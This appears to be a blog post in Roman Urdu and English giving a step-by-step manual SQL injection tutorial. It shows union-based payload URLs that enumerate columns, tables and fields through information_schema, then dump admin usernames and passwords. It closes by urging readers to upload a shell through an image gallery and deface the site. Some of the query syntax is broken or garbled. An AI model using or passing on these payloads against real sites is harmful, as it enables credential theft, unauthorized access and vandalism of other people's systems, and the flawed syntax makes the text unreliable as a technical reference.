This Is Basic Manul SQL injection Tutorial for all of You...
Tools we Need
=FireFox
=HackBar
=havij for finding Admin Panel
Steps to Exploit.
1-Sub sy phly hamin vulenerable website find karni hy...
http://example.com/index.php?id=15
2.Ab hamy dekhna hy k site vulenerable hy k nai is k liye id k bad hum ' add karin gy
http://example.com/index.php?id=15
3-Ab hum Columns find kary gy.
Example:
http://example.com/index.php?id=15 order by 1--
http://example.com/index.php?id=15 order by 2--
http://example.com/index.php?id=15 order by 3--
http://example.com/index.php?id=15 order by 4--
http://example.com/index.php?id=15 order by 5--
http://example.com/index.php?id=15 order by 6--
1 errorr Aagaya Unknown Column in order To Clause "6"
Iska Matlb http://www.examplephp?id=15 Per Sirf 5 hi Columns hain
4-Ab Union Select Waala Method Start :-)
union Find Karne Se Pehele Vuln Web Ki Value Per - Lagaden !
http://example.com/index.php?id=-15 Aesy!
Or Ab Vulnerable column Find KAren!
http://www.example.com/index.php?id=-15 Union Select 1,2,3,4,5 vuln web per sirf 5 Columns the!
Phir Kuch Numbers Screen Per Aajeynge Jese 2 3 etc....!
Jo Sub Se Zyada Dark Or Bold Ho Wo Sab Se Zyada Vulnerable hai!
Sochen 2 Sab Se Zyada Dark Or Bold hai!
5-Ab Tables Found KArne Waal Method Start :-)
Table Found KArne K Liye Sab Se Zyada Dark Or Bold Number "2" Ko Hatake !
ye Likhen group_concat(table_name) or Phir Aakhir main from information_schema.tables where table_schema= database ()--
Example:-)
http://www.example.com/index.php?id=-15 union Select
1,group_concat(table_name),3,4,5 from information_schema.tables where
table_schema= database ()--
Aise Likhna Hai 2 Ki Jaga Per
So ye hamain Table DedeGa magar Dihaan rahe Sab Kuch Theek Likeyega warna My_sql Fetch error Aajayega!
Like:-) admin,user,post,contacts,timing,gallery, etc etc...!
hamain chahiye Admin Table ! Ab Apna hackBar kholeye Jo k 1 FireFox Addon hai!
Or wahan MySql Likha Hai Wahan Ja Kar CHAR Menu Kholen Or Likhen "Admin"!
Or Wo Kuch Is Tarha Char Dega CHAR(12,13,14,21,43,235,2365,21,) Ye Real nahi hai!
Ok!
6-ab Aapko group_concat(table_name0 Ki Jagah group_concat(column_name) Likhna hOgA Tongue
Or form Information_schema.tables Ki Jagah column Likhna hai Or table_schema= Ki Jagah per table_name Likhna hai Tongue
Example:-) http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Ab Column FindinG <Method>
Ab aapko Apni vulnerable Web k aage Ye Karna hai Jo neeche hai
http://www.vuln.in/index.php?id=-15 union Select
1,group_concat(column_name)3,4,5 from information_schema.columns where
table_name= ChaR (1,2,13,1,3,2142,354,234,)
Done
to Phir Ye aapko Kuch Istarha Dega
logs,username,password,date etc etc hamain username and Password Chahiye!
ab Passwor dKese nikaalen??? Neeche hai sab Kuch
http://www.example.com/index.php?id=-15 1,group_concat(username,0x3a,Password) from admin
Or Pass Aapka
Gallery Main images upload Is Best for uploading Shell :X
Ab Aap Apna Shell uPload KAren or deface Karden Tongue
Enjoy............
0 comments:
Post a Comment